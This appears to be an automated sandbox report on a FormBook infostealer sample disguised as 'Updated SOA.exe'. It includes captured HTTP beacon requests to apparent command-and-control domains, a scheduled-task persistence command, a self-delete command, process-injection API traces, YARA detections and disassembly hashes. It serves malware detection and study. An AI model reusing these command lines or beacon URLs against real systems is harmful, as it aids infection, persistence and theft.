                                                                          Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                                                          Sep 21, 2021 02:20:55.697942972 CEST6982INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          7192.168.2.34980270.40.216.22980C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Sep 21, 2021 02:21:06.154762030 CEST6983OUTGET /b2c0/?_JE=fiodKOJcDC+U41n6yUoUA/NOfrt4VaPFcyjK7goYzH96zQ9HGoFcrenwBQCzJ6xg1U1l&-Z=9rjLOxDhNVLl4X HTTP/1.1
                                                                          Host: www.starsspell.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Sep 21, 2021 02:21:07.205437899 CEST6984INHTTP/1.1 301 Moved Permanently
                                                                          Date: Tue, 21 Sep 2021 00:21:06 GMT
                                                                          Server: Apache
                                                                          X-Redirect-By: WordPress
                                                                          Content-Security-Policy: upgrade-insecure-requests
                                                                          Upgrade: h2,h2c
                                                                          Connection: Upgrade, close
                                                                          Location: https://starsspell.com/b2c0/?_JE=fiodKOJcDC+U41n6yUoUA/NOfrt4VaPFcyjK7goYzH96zQ9HGoFcrenwBQCzJ6xg1U1l&-Z=9rjLOxDhNVLl4X
                                                                          host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                                          Referrer-Policy: no-referrer-when-downgrade
                                                                          Content-Length: 0
                                                                          Content-Type: text/html; charset=UTF-8


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          8192.168.2.34980334.102.136.18080C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Sep 21, 2021 02:21:11.726536036 CEST6985OUTGET /b2c0/?_JE=ngE3zTEQZhYKSyvQI1JtRqVv6LVi69c0agGQYGihkwEIgq8iGc/2kBp4e4/I6lFanwA/&-Z=9rjLOxDhNVLl4X HTTP/1.1
                                                                          Host: www.newstodayupdate.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Sep 21, 2021 02:21:11.917900085 CEST6985INHTTP/1.1 403 Forbidden
                                                                          Server: openresty
                                                                          Date: Tue, 21 Sep 2021 00:21:11 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 275
                                                                          ETag: "6138e204-113"
                                                                          Via: 1.1 google
                                                                          Connection: close
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                          Code Manipulations

                                                                          Statistics

                                                                          CPU Usage

                                                                          Click to jump to process

                                                                          Memory Usage

                                                                          Click to jump to process

                                                                          High Level Behavior Distribution

                                                                          Click to dive into process behavior distribution

                                                                          Behavior

                                                                          Click to jump to process

                                                                          System Behavior

                                                                          Analysis Process: Updated SOA.exe PID: 1380 Parent PID: 3708

                                                                          General

                                                                          Start time:02:19:04
                                                                          Start date:21/09/2021
                                                                          Path:C:\Users\user\Desktop\Updated SOA.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:'C:\Users\user\Desktop\Updated SOA.exe'
                                                                          Imagebase:0x770000
                                                                          File size:833024 bytes
                                                                          MD5 hash:08098C5EF23FB87AF19A5ADBDD31324B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:.Net C# or VB.NET
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.239287823.0000000002B91000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.240050165.0000000003CCC000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.240050165.0000000003CCC000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.240050165.0000000003CCC000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.239734200.0000000003B99000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.239734200.0000000003B99000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.239734200.0000000003B99000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          Reputation:low

                                                                          Chronological Activities

                                                                          Analysis Process: schtasks.exe PID: 5548 Parent PID: 1380

                                                                          General

                                                                          Start time:02:19:16
                                                                          Start date:21/09/2021
                                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\oydxFbGhGlh' /XML 'C:\Users\user\AppData\Local\Temp\tmp14E0.tmp'
                                                                          Imagebase:0x860000
                                                                          File size:185856 bytes
                                                                          MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          Chronological Activities

                                                                          Analysis Process: conhost.exe PID: 3544 Parent PID: 5548

                                                                          General

                                                                          Start time:02:19:16
                                                                          Start date:21/09/2021
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6b2800000
                                                                          File size:625664 bytes
                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          Chronological Activities

                                                                          Analysis Process: Updated SOA.exe PID: 1968 Parent PID: 1380

                                                                          General

                                                                          Start time:02:19:16
                                                                          Start date:21/09/2021
                                                                          Path:C:\Users\user\Desktop\Updated SOA.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user\Desktop\Updated SOA.exe
                                                                          Imagebase:0x4e0000
                                                                          File size:833024 bytes
                                                                          MD5 hash:08098C5EF23FB87AF19A5ADBDD31324B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.300181528.0000000000F20000.00000040.00020000.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.300181528.0000000000F20000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.300181528.0000000000F20000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.300204060.0000000000F50000.00000040.00020000.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.300204060.0000000000F50000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.300204060.0000000000F50000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.299772162.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.299772162.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.299772162.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          Reputation:low

                                                                          Chronological Activities

                                                                          Analysis Process: explorer.exe PID: 3388 Parent PID: 1968

                                                                          General

                                                                          Start time:02:19:18
                                                                          Start date:21/09/2021
                                                                          Path:C:\Windows\explorer.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\Explorer.EXE
                                                                          Imagebase:0x7ff714890000
                                                                          File size:3933184 bytes
                                                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.287563072.000000000E2BA000.00000040.00020000.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.287563072.000000000E2BA000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000000.287563072.000000000E2BA000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.266285027.000000000E2BA000.00000040.00020000.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.266285027.000000000E2BA000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000000.266285027.000000000E2BA000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          Reputation:high

                                                                          Chronological Activities

                                                                          Analysis Process: cmmon32.exe PID: 4896 Parent PID: 3388

                                                                          General

                                                                          Start time:02:19:42
                                                                          Start date:21/09/2021
                                                                          Path:C:\Windows\SysWOW64\cmmon32.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\SysWOW64\cmmon32.exe
                                                                          Imagebase:0xdf0000
                                                                          File size:36864 bytes
                                                                          MD5 hash:2879B30A164B9F7671B5E6B2E9F8DFDA
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.483644410.0000000000C00000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.483644410.0000000000C00000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.483644410.0000000000C00000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.481945412.0000000000120000.00000040.00020000.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.481945412.0000000000120000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.481945412.0000000000120000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.483325816.0000000000BD0000.00000040.00020000.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.483325816.0000000000BD0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.483325816.0000000000BD0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          Reputation:moderate

                                                                          Chronological Activities

                                                                          Analysis Process: cmd.exe PID: 6168 Parent PID: 4896

                                                                          General

                                                                          Start time:02:19:46
                                                                          Start date:21/09/2021
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:/c del 'C:\Users\user\Desktop\Updated SOA.exe'
                                                                          Imagebase:0xbd0000
                                                                          File size:232960 bytes
                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          Chronological Activities

                                                                          Analysis Process: conhost.exe PID: 6176 Parent PID: 6168

                                                                          General

                                                                          Start time:02:19:47
                                                                          Start date:21/09/2021
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6b2800000
                                                                          File size:625664 bytes
                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          Chronological Activities

                                                                          Disassembly

                                                                          Code Analysis

                                                                          Reset < >

                                                                            Analysis Process: Updated SOA.exe PID: 1380 Parent PID: 3708 Updated SOA.exeCOMMON

                                                                            Executed Functions

                                                                            Function 077354E0, Relevance: 2.3, Strings: 1, Instructions: 1042COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 3e5q
                                                                            • API String ID: 0-150274692
                                                                            • Opcode ID: fdfe93991e29a15099a1245cff5467001f24957e3780663226f0021ea2e12aab
                                                                            • Instruction ID: 971652f11604dc685349e2139519d6162cba189d27ad18bb8aefe099b27ce6cc
                                                                            • Opcode Fuzzy Hash: fdfe93991e29a15099a1245cff5467001f24957e3780663226f0021ea2e12aab
                                                                            • Instruction Fuzzy Hash: 3CB2D375E00628CFDB64CF69C984AD9BBB2FF89304F1581E9D509AB225DB319E91CF40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 08102808, Relevance: 1.9, Strings: 1, Instructions: 622COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243650623.0000000008100000.00000040.00000001.sdmp, Offset: 08100000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $%m
                                                                            • API String ID: 0-111698852
                                                                            • Opcode ID: bdf7b17b70f8cd36bd748b3feaa70e41e08f5ae22e160bc004ef5f3c38f197c3
                                                                            • Instruction ID: 72f31e5c26d16fc0a28819de178ba62ff1fcf82e4d2dbe9eafc7df6a21bc8e57
                                                                            • Opcode Fuzzy Hash: bdf7b17b70f8cd36bd748b3feaa70e41e08f5ae22e160bc004ef5f3c38f197c3
                                                                            • Instruction Fuzzy Hash: 4B32BC30B012058FDB1ADB68C954BAEB7F6AF88305F24406DE545DB3A1DB75ED02CB61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0773A070, Relevance: .3, Instructions: 263COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: be25dd18557482cbef5c2c14f67a5f3690f95bf8108a9f29e4d6e80ec70b16ad
                                                                            • Instruction ID: 4ef064c6dd62cf9053fb1737b83a2f2a0ff6ad45dee03c43a92caf0f92c58ba2
                                                                            • Opcode Fuzzy Hash: be25dd18557482cbef5c2c14f67a5f3690f95bf8108a9f29e4d6e80ec70b16ad
                                                                            • Instruction Fuzzy Hash: 7CB138B1D042098FDB04DFA9C586AAEFBF2BF89344F25C029E454AB346E7349946CF51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0773A061, Relevance: .3, Instructions: 257COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7bf92bfa8521e58a54d99f06b6b904f5f6313a01043bc7d133bea48fe03bb7fb
                                                                            • Instruction ID: ce826fff1ab857a79cb410ae320f6aba36d9d489f33a8c71dc69443dbf4bf46f
                                                                            • Opcode Fuzzy Hash: 7bf92bfa8521e58a54d99f06b6b904f5f6313a01043bc7d133bea48fe03bb7fb
                                                                            • Instruction Fuzzy Hash: 4BA139B1D042098FDB04DFA9C586AAEFBF2BF89344F15C129E448AB346E7349946CF51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07734C79, Relevance: .2, Instructions: 226COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a165b7da158ba3326c91c05d2b4bc829fb074030c5ce9e72b178b08fb45aeddf
                                                                            • Instruction ID: 29cdbc36eee088a144838f9f5dc18e24ddb2b6a1d708b7cc229d13b4380974bc
                                                                            • Opcode Fuzzy Hash: a165b7da158ba3326c91c05d2b4bc829fb074030c5ce9e72b178b08fb45aeddf
                                                                            • Instruction Fuzzy Hash: 7FA139B4D10258CFDB08DFA9D9996AEBBF2FF89300F10846AE419A7385DB345945CF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0106C181, Relevance: 6.1, APIs: 4, Instructions: 124threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32 ref: 0106C1F0
                                                                            • GetCurrentThread.KERNEL32 ref: 0106C22D
                                                                            • GetCurrentProcess.KERNEL32 ref: 0106C26A
                                                                            • GetCurrentThreadId.KERNEL32 ref: 0106C2C3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.239032087.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                                            Similarity
                                                                            • API ID: Current$ProcessThread
                                                                            • String ID:
                                                                            • API String ID: 2063062207-0
                                                                            • Opcode ID: ccecd3e9a211d8b239b5ed368563f451456ca3d3fd9352d0bc7fe3c792c29036
                                                                            • Instruction ID: b118b1984ac1c9b76e03f019059b1e3db831e93e5c574f04ab28564fe1a75320
                                                                            • Opcode Fuzzy Hash: ccecd3e9a211d8b239b5ed368563f451456ca3d3fd9352d0bc7fe3c792c29036
                                                                            • Instruction Fuzzy Hash: 5C5167B0D002498FEB14CFAADA48BDEBBF4EF48314F20849AD459A7360D7786945CF61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0106C190, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32 ref: 0106C1F0
                                                                            • GetCurrentThread.KERNEL32 ref: 0106C22D
                                                                            • GetCurrentProcess.KERNEL32 ref: 0106C26A
                                                                            • GetCurrentThreadId.KERNEL32 ref: 0106C2C3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.239032087.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                                            Similarity
                                                                            • API ID: Current$ProcessThread
                                                                            • String ID:
                                                                            • API String ID: 2063062207-0
                                                                            • Opcode ID: 8210becfd1a9eedfefb2da016753a90ddd9252294ffc5132992a4a164e646945
                                                                            • Instruction ID: d730cd920f0b2be814c724dc60aa8c89209fd4ba1e1824507f70bf9fb66961a1
                                                                            • Opcode Fuzzy Hash: 8210becfd1a9eedfefb2da016753a90ddd9252294ffc5132992a4a164e646945
                                                                            • Instruction Fuzzy Hash: BF5155B0D006498FEB14CFAADA48BDEBBF4FB48314F20845AE459A7350D774A844CF65
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07732F60, Relevance: 2.5, Strings: 2, Instructions: 45COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $%m$$%m
                                                                            • API String ID: 0-1229718004
                                                                            • Opcode ID: a038929a57c8d43127030af3d0b7693583d0619cb49d10b1a3207bf0c8853f99
                                                                            • Instruction ID: 8cf9acd1264cebd466c99b2321459d26b2816391f46865c41f2eb2e37463be39
                                                                            • Opcode Fuzzy Hash: a038929a57c8d43127030af3d0b7693583d0619cb49d10b1a3207bf0c8853f99
                                                                            • Instruction Fuzzy Hash: 4801A9B07006168BD768E765D61096AB3DAAFC2258725CD7DD4068B397CF71DC03CBA2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 074FEDE8, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 074FF01E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243296408.00000000074F0000.00000040.00000001.sdmp, Offset: 074F0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: CreateProcess
                                                                            • String ID:
                                                                            • API String ID: 963392458-0
                                                                            • Opcode ID: 1c3fb9c130da5db5389d549577ba9faf1669a0c591abd6deac81fec600cad857
                                                                            • Instruction ID: ef18a5e2b83045def40561242e08787aca65562af5a396f00cf05440fe09bcd7
                                                                            • Opcode Fuzzy Hash: 1c3fb9c130da5db5389d549577ba9faf1669a0c591abd6deac81fec600cad857
                                                                            • Instruction Fuzzy Hash: 8C917EB1D0022ADFDB20CFA4CD417EEBBB2BF44314F14856AE919A7290DB749985CF91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01069EA8, Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0106A0EE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.239032087.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID:
                                                                            • API String ID: 4139908857-0
                                                                            • Opcode ID: 447de2bffb509a8e7c0ff79afab8981007c7c74c3fa441c42187d9059d3a8389
                                                                            • Instruction ID: fb073cff062b7100c05cbb372f1bac857ab6d87b3219030aecdb1a1cf30cd8a8
                                                                            • Opcode Fuzzy Hash: 447de2bffb509a8e7c0ff79afab8981007c7c74c3fa441c42187d9059d3a8389
                                                                            • Instruction Fuzzy Hash: D1715970A00B058FD764DF69D54479ABBF9FF88308F10896DD48ADBA40DB35E845CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01065A2C, Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 01065AE9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.239032087.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: 03295bfcdef89922f0b979b3b63a322d11742c0d1509e2afb1e40ef95e6ac60a
                                                                            • Instruction ID: 7204ee97be9c6261dc737493381225247c2bfc23d843bafddfe4b34e74701115
                                                                            • Opcode Fuzzy Hash: 03295bfcdef89922f0b979b3b63a322d11742c0d1509e2afb1e40ef95e6ac60a
                                                                            • Instruction Fuzzy Hash: 48410171C0021CCBDB24CFA9C9857DDBBB5BF48308F24846AD409BB251DB71694ACF90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01063D24, Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 01065AE9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.239032087.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: 1d67bbeb82cbfbc981fb09640ea9ea0524f6def05117556c8ea67f02d3ab46c3
                                                                            • Instruction ID: 95fea2279e8d27bb2b7b38ac8f19f8bfbf052a51ff8ec11296acbe3e09576c00
                                                                            • Opcode Fuzzy Hash: 1d67bbeb82cbfbc981fb09640ea9ea0524f6def05117556c8ea67f02d3ab46c3
                                                                            • Instruction Fuzzy Hash: 3841F270C0061DCBDB24DFA9C984BDEBBF9BF48308F248469D409AB250DB70694ACF90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0106C477, Relevance: 1.6, APIs: 1, Instructions: 91COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0106C43F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.239032087.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID:
                                                                            • API String ID: 3793708945-0
                                                                            • Opcode ID: d5fecff64c8ec85440afb7f9306b6db9a8c8a67be7f6f760aee423446cea6fd1
                                                                            • Instruction ID: 0dec10c020acbc1626eaab920b2b8b46361791c632b76d59514550cf16fe5345
                                                                            • Opcode Fuzzy Hash: d5fecff64c8ec85440afb7f9306b6db9a8c8a67be7f6f760aee423446cea6fd1
                                                                            • Instruction Fuzzy Hash: A2316978A44345AFF300DF60F65E77A7BA6FB89315F10842AE9098B799DB384902CF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 074FEA70, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 074FEB00
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243296408.00000000074F0000.00000040.00000001.sdmp, Offset: 074F0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: MemoryProcessWrite
                                                                            • String ID:
                                                                            • API String ID: 3559483778-0
                                                                            • Opcode ID: 723860bed8f7ddb6cd64ad8ae9f975378fa35cbcbbdc974b68e43e5f6ed97906
                                                                            • Instruction ID: 89e0a2c1719c1525d30dee7e2f9611b55fd5f014e39a7db50c1900be19fc8302
                                                                            • Opcode Fuzzy Hash: 723860bed8f7ddb6cd64ad8ae9f975378fa35cbcbbdc974b68e43e5f6ed97906
                                                                            • Instruction Fuzzy Hash: 962128B1D003599FCB10CFA9C9857EEBBF5FF48314F14842AE919A7250D7789954CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 074FE748, Relevance: 1.6, APIs: 1, Instructions: 63threadinjectionCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetThreadContext.KERNELBASE(?,00000000), ref: 074FE7C6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243296408.00000000074F0000.00000040.00000001.sdmp, Offset: 074F0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: ContextThread
                                                                            • String ID:
